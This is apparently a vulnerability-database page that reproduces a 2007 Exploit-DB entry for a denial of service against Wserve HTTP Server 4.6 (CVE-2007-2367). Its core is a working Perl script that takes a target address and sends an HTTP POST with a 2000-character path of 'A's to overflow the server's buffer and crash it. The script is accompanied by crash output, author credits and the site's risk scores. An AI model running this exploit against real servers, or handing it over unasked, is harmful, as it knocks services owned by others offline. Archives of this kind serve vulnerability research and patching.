Lucene search
+L

Wserve HTTP Server 4.6 - Long Directory Name Denial of Service

🗓️ 05 Apr 2007 00:00:00Reported by WiLdBoYType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

Wserve HTTP Server 4.6 Buffer Overflow Denial of Servic

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-2367
30 Apr 200723:00
cve
cvelist
Cvelist
CVE-2007-2367
30 Apr 200723:00
cvelist
euvd
EUVD
EUVD-2007-2362
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-2367
30 Apr 200723:19
nvd
prion
Prion
Buffer overflow
30 Apr 200723:19
prion
#!perl
# Wserve HTTP Server 4.6 Version (Long Directory Name) Buffer Overflow - Denial Of Service
# Type :
# Buffer Overflow - Denial of Service
# Release Date :
# {2007-04-05}
# Product / Vendor :
# Wserve HTTP Server
# http://sourceforge.net/projects/whttp
# PoC :
# GET / HTTP/1.0\r\n /127.0.0.1:80/AAAAAA[2000].
# Error :
# Buffer Overrun Detected!
# Program:...~\Temp\Rar$EX00.906\wserve\wserve_console.exe
# A buffer overrun has been detected which has corrupted the program's internal state.The program cannot safely continue
# execution and must now be terminated

# Exploit :

use LWP::UserAgent;

$unique = LWP::UserAgent->new;

$address = shift or die("Insert A Target");

$req = HTTP::Request->new(POST => "http://$address:80/" . A x 2000);

$res = $unique->request($req);

print $res->as_string;

# Tested :

# --- Wserve HTTP Server 4.6 ---

# Vulnerable :

# --- Wserve HTTP Server 4.6 ---

# Author :

# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org

# milw0rm.com [2007-04-05]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Apr 2011 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.03735
33